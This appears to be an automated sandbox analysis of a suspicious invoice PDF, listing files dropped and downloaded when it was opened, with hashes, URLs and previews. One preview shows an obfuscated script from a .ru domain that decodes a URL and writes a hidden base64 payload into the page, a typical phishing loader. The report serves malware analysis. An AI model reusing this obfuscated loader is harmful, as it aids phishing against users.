                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                          Category:dropped
                          Size (bytes):758601
                          Entropy (8bit):7.98639316555857
                          Encrypted:false
                          SSDEEP:
                          MD5:59EE5E2FB56A099CAA8EDFD7AF821ED6
                          SHA1:F5DC4F876768D57B69EC894ADE0A66E813BFED92
                          SHA-256:E100AAAA4FB2B3D78E3B6475C3B48BE189C5A39F73CFC2D22423F2CE928D3E75
                          SHA-512:77A45C89F6019F92576D88AE67B59F9D6D36BA6FDC020419DAB55DBD8492BA97B3DAC18278EB0210F90758B3D643EA8DCF8EC2BD1481930A59B8BB515E7440FE
                          Malicious:false
                          Reputation:unknown
                          Preview:...........].s..R/c..D@..\......3Z.....E.,...d{.k.~..H3....-......A...<>n.......X..Dp..d......f.{...9&F..........R.UW-..^..zC.kjOUUMm...nW...Z.7.J.R.....=*.R........4..(WCMQ..u]]R...R......5.*..N)].....!.-.d]M....7.......i..rmP...6A.Z .=..~..$C-..}..Mo.T......:._'.S....r.9....6.....r....#...<U@.Iiu..X].T x.j....x...:q.....j]P3......[.5]|..7;.5....^..7(.E..@..s...2..}..j....*...t.5J...6Rf..%P{2T^$Y.V.O9.W...4...\ .5............Q.&j....h.+.u......W...4f]..s..(...:....`.<W_...z*Bs|tF5 NI4.zD..5...u...!........M.0.K%F....,.c.....>R6..i..Am.y.~5..S....M...^......F.&..V...Z.......i....b....V..,.UH"...W...5}A.....KUT..=6jZ.....B...Z...Y(..u...=....x,2..."._Cf.....b...z7..... r..#.r..L9....2...R,..J?&..p..~.....3.=z...w..m..U..%._#<....r.....B.z..G..D.:4m.Z.&.N......</..Dz+.......vn.....;Qhk....!dw...A......3..a..K...).Q.`t[..)].6.%@....v.g.%E>;Z...uz.L..6Ct..O.Eo.O.e..........J.J$...:....K..)......F.....ZWE...z..5..g.io...l2[.,m9X..f......5|:bj[.._R{gi...^
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                          Category:dropped
                          Size (bytes):386528
                          Entropy (8bit):7.9736851559892425
                          Encrypted:false
                          SSDEEP:
                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                          Malicious:false
                          Reputation:unknown
                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65447)
                          Category:downloaded
                          Size (bytes):89501
                          Entropy (8bit):5.289893677458563
                          Encrypted:false
                          SSDEEP:
                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                          Malicious:false
                          Reputation:unknown
                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (65360)
                          Category:downloaded
                          Size (bytes):912027
                          Entropy (8bit):3.111999441119187
                          Encrypted:false
                          SSDEEP:
                          MD5:B8ACBA3A765A501040D39D092AA1F493
                          SHA1:6F232CC7EC0C4ED02B9B15E4C1B726225845C5E8
                          SHA-256:4A3C37097A43EDC1710B51724948B02AB90F2346AC0F1303ED563453843489C5
                          SHA-512:929451330486B8D8ED43E31445C9D1EC7A9A020C823AB77CD62292C5935857F436E4329F7F16129F18A577BE3C7E007685F72995A4EFB32E710573C09F5C5834
                          Malicious:false
                          Reputation:unknown
                          URL:https://qs1ywa.vsmaemhjvk.ru/vHFigT/
                          Preview:<script>.wmTVgTGoyl = atob("aHR0cHM6Ly91WjVrLnZzbWFlbWhqdmsucnUvdkhGaWdULw==");.bSXMlUKzpD = atob("bm9tYXRjaA==");.EnTCqGdlJo = atob("d3JpdGU=");.if(wmTVgTGoyl == bSXMlUKzpD){.document[EnTCqGdlJo](decodeURIComponent(escape(atob('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
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):16
                          Entropy (8bit):3.5
                          Encrypted:false
                          SSDEEP:
                          MD5:F1C9C44E663E7E62582E3F5B236C1C72
                          SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                          SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                          SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                          Malicious:false
                          Reputation:unknown
                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCRuID-IvZ2TSEgUNNzCpMCGT6uex6izNtA==?alt=proto
                          Preview:CgkKBw03MKkwGgA=
                          File type:PDF document, version 1.6
                          Entropy (8bit):7.930185340136312
                          TrID:
                          • Adobe Portable Document Format (5005/1) 100.00%
                          File name:Invoice1-1706517.pdf
                          File size:52'890 bytes
                          MD5:5af5ee83faae160ffab3cd5c8cd28117
                          SHA1:40c1f5fa7e36d118aaf8b467f455eb1c6189eaf6
                          SHA256:53924aaf790a371a77f5fe5bc1c85ed924e4c26762eea55911845744692274a8
                          SHA512:b3ccb22463c36126ac9ba60596bba193c5adf917b4712bbb37cdf47602aedbe2e76029f3fd595a4ef2469bb39f50420cc2545bbda1ccdf0a662047385a602972
                          SSDEEP:1536:oaZC54j2Aup+lgekiqCAltX3/MCgPnTn9dz:HZCSaAusSi+XvjETn9dz
                          TLSH:973302ACA854DC8CDDE469B6204043CE42DF6C3B9FD617322ECBA3419E8930AB5D4DA4
                          File Content Preview:%PDF-1.6.%.....2 0 obj.<<./Lang <FEFF0045004E002D00550053>./MarkInfo 4 0 R./Metadata 5 0 R./PageLayout /OneColumn./Pages 6 0 R./StructTreeRoot 7 0 R./Type /Catalog./AcroForm 8 0 R.>>.endobj.5 0 obj.<<./Subtype /XML./Type /Metadata./Filter /FlateDecode./Le
                          Icon Hash:62cc8caeb29e8ae0

                          General

                          Header:%PDF-1.6
                          Total Entropy:7.930185
                          Total Bytes:52890
                          Stream Entropy:7.929924
                          Stream Bytes:51800
                          Entropy outside Streams:5.203096
                          Bytes outside Streams:1090
                          Number of EOF found:1
                          Bytes after EOF:
                          Name            Count
                          obj             9
                          endobj          9
                          stream          7
                          endstream       7
                          xref            0
                          trailer         0
                          startxref       1
                          /Page           0
                          /Encrypt        0
                          /ObjStm         1
                          /URI            0
                          /JS             0
                          /JavaScript     0
                          /AA             0
                          /OpenAction     0
                          /AcroForm       1
                          /JBIG2Decode    0
                          /RichMedia      0
                          /Launch         0
                          /EmbeddedFile   0
                          IDDHASHMD5Preview
                          3211313038394f373699a66323ff5e1bcbb778db6bfb3b60cf